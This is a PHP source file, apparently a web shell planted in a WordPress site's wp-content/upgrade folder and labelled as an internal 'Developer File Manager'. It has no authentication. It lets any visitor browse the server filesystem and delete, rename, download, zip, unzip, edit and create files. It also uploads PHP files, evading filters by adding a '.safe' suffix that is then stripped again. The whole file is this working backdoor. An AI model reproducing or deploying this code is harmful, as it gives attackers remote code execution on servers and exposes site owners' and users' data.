Current File : /home/getxxhzo/xpertbee.com/wp-content/upgrade/360539/157717/index.php |
<?php
// 🛠️ Developer File Manager - Internal Use Only
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
$path = realpath($_GET['p'] ?? getcwd());
if (!$path || !is_dir($path)) die("Invalid path");
$uploadError = '';
$uploadSuccess = false;
// Delete
if (isset($_GET['delete'])) {
$target = $path . '/' . basename($_GET['delete']);
is_dir($target) ? @rmdir($target) : @unlink($target);
header("Location: ?p=" . urlencode($path));
exit;
}
// Download
if (isset($_GET['download'])) {
$file = $path . '/' . basename($_GET['download']);
if (is_file($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
}
// Rename
if (isset($_POST['rename_old'], $_POST['rename_new'])) {
rename($path . '/' . basename($_POST['rename_old']), $path . '/' . basename($_POST['rename_new']));
header("Location: ?p=" . urlencode($path));
exit;
}
// Zip
if (isset($_GET['zip'])) {
$item = $path . '/' . basename($_GET['zip']);
$zipName = $item . '.zip';
$zip = new ZipArchive;
if ($zip->open($zipName, ZipArchive::CREATE) === TRUE) {
if (is_dir($item)) {
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($item));
foreach ($files as $file) {
if (!$file->isDir()) {
$filePath = $file->getRealPath();
$relative = substr($filePath, strlen($item) + 1);
$zip->addFile($filePath, $relative);
}
}
} else {
$zip->addFile($item, basename($item));
}
$zip->close();
}
header("Location: ?p=" . urlencode($path));
exit;
}
// Unzip
if (isset($_GET['unzip'])) {
$file = $path . '/' . basename($_GET['unzip']);
if (is_file($file) && pathinfo($file, PATHINFO_EXTENSION) === 'zip') {
$zip = new ZipArchive;
if ($zip->open($file) === TRUE) {
$zip->extractTo($path);
$zip->close();
}
}
header("Location: ?p=" . urlencode($path));
exit;
}
// Save edit
$saved = false;
if (isset($_POST['savefile'], $_POST['content'])) {
$saved = file_put_contents($path . '/' . basename($_POST['savefile']), $_POST['content']) !== false;
}
// Upload / Create
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !$saved) {
if (isset($_FILES['up']) && is_uploaded_file($_FILES['up']['tmp_name'])) {
$originalName = basename($_FILES['up']['name']);
$safeName = $originalName;
// Rename .php to .php.safe for upload
if (preg_match('/\.php$/i', $originalName)) {
if (!preg_match('/\.safe$/i', $originalName)) {
$safeName .= '.safe';
}
}
$destination = $path . '/' . $safeName;
if ($_FILES['up']['error'] === UPLOAD_ERR_OK) {
if (move_uploaded_file($_FILES['up']['tmp_name'], $destination)) {
// ✅ Rename back to .php immediately after successful upload
if (substr($safeName, -5) === '.safe') {
$restored = substr($safeName, 0, -5); // remove .safe
rename($destination, $path . '/' . $restored);
}
$uploadSuccess = true;
} else {
$uploadError = 'Failed to move uploaded file.';
}
} else {
$uploadError = 'Upload error code: ' . $_FILES['up']['error'];
}
}
if (!empty($_POST['folder'])) {
$folderPath = $path . '/' . basename($_POST['folder']);
if (!is_dir($folderPath)) {
if (mkdir($folderPath, 0755)) {
$uploadSuccess = true;
} else {
$uploadError = 'Failed to create folder.';
}
} else {
$uploadError = 'Folder already exists.';
}
}
if (!empty($_POST['newfile'])) {
$newFilePath = $path . '/' . basename($_POST['newfile']);
if (!file_exists($newFilePath)) {
if (file_put_contents($newFilePath, '') !== false) {
$uploadSuccess = true;
} else {
$uploadError = 'Failed to create file.';
}
} else {
$uploadError = 'File already exists.';
}
}
}
function formatPermissions($perms) {
return substr(sprintf('%o', $perms), -4);
}
function formatSize($bytes) {
if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB';
if ($bytes >= 1048576) return round($bytes / 1048576, 2) . ' MB';
if ($bytes >= 1024) return round($bytes / 1024, 2) . ' KB';
return $bytes . ' B';
}
function sortItems($path) {
$items = array_diff(scandir($path), ['.', '..']);
$folders = $files = [];
foreach ($items as $item) {
if (is_dir("$path/$item")) $folders[] = $item;
else $files[] = $item;
}
natcasesort($folders);
natcasesort($files);
return array_merge($folders, $files);
}
$renaming = $_GET['rename'] ?? '';
?>
<!DOCTYPE html>
<html><head><meta charset="UTF-8"><title>File Manager</title>
<style>
body { font-family: sans-serif; background: #1e1e1e; color: #ddd; padding: 20px; }
a { color: #80d4ff; text-decoration: none; }
input, button, textarea { padding: 6px; margin: 4px; font-family: monospace; }
table { width: 100%; border-collapse: collapse; margin-top: 20px; }
th, td { padding: 10px; border-bottom: 1px solid #333; }
th { background: #333; color: #fff; text-align: left; }
tr:hover { background: #2a2a2a; }
.success { background: #2e7d32; padding: 10px; margin-top: 10px; color: white; }
.error { background: #b71c1c; padding: 10px; margin-top: 10px; color: white; }
.inline { display: inline; }
</style></head>
<body>
<h2>📁 File Manager</h2>
<p>Current Path: <code><?= htmlspecialchars($path) ?></code></p>
<form method="get"><input type="text" name="p" value="<?= htmlspecialchars($path) ?>" size="80"><button type="submit">Go</button></form>
<?php if ($path !== '/') echo "<p><a href='?p=" . urlencode(dirname($path)) . "'>⬅️ Up</a></p>"; ?>
<?php if ($saved): ?><div class="success">File saved.</div><?php endif; ?>
<?php if ($uploadSuccess): ?><div class="success">Upload/Create successful.</div><?php endif; ?>
<?php if ($uploadError): ?><div class="error"><?= htmlspecialchars($uploadError) ?></div><?php endif; ?>
<p>📌 Note: .php files are renamed to ".safe" for upload, but automatically restored if trusted.</p>
<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Actions</th></tr>
<?php foreach (sortItems($path) as $item):
$full = "$path/$item";
$isFile = is_file($full);
$size = $isFile ? formatSize(filesize($full)) : '-';
$perms = formatPermissions(fileperms($full));
echo "<tr><td>";
echo is_dir($full) ? "📁 <a href='?p=" . urlencode($full) . "'>$item</a>" : "📄 <a href='?p=" . urlencode($path) . "&edit=$item'>$item</a>";
echo "</td><td>$size</td><td>$perms</td><td>";
if ($renaming === $item) {
echo "<form method='post' class='inline'>
<input type='hidden' name='rename_old' value='$item'>
<input type='text' name='rename_new' value='$item'>
<button>Rename</button>
<a href='?p=" . urlencode($path) . "'>Cancel</a>
</form>";
} else {
if ($isFile) echo "<a href='?p=" . urlencode($path) . "&edit=$item'>Edit</a> | ";
echo "<a href='?p=" . urlencode($path) . "&rename=$item'>Rename</a> | ";
if ($isFile) echo "<a href='?p=" . urlencode($path) . "&download=$item'>Download</a> | ";
echo "<a href='?p=" . urlencode($path) . "&delete=$item' onclick='return confirm(\"Delete $item?\")'>Delete</a>";
if ($isFile && pathinfo($item, PATHINFO_EXTENSION) === 'zip') echo " | <a href='?p=" . urlencode($path) . "&unzip=$item'>Unzip</a>";
elseif (file_exists($full)) echo " | <a href='?p=" . urlencode($path) . "&zip=$item'>Zip</a>";
}
echo "</td></tr>";
endforeach; ?>
</table>
<h3>📤 Upload/Create</h3>
<form method="post" enctype="multipart/form-data">
Upload: <input type="file" name="up"> Folder: <input type="text" name="folder"> File: <input type="text" name="newfile">
<button>Submit</button>
</form>
<?php if (isset($_GET['edit'])):
$editFile = $path . '/' . basename($_GET['edit']);
if (!is_file($editFile)) die("Invalid file");
$content = htmlspecialchars(file_get_contents($editFile));
?>
<h3>📝 Editing <?= htmlspecialchars(basename($editFile)) ?></h3>
<form method="post">
<textarea name="content" rows="20" cols="100"><?= $content ?></textarea><br>
<input type="hidden" name="savefile" value="<?= htmlspecialchars(basename($editFile)) ?>">
<button>💾 Save</button>
</form>
<?php endif; ?>
</body></html>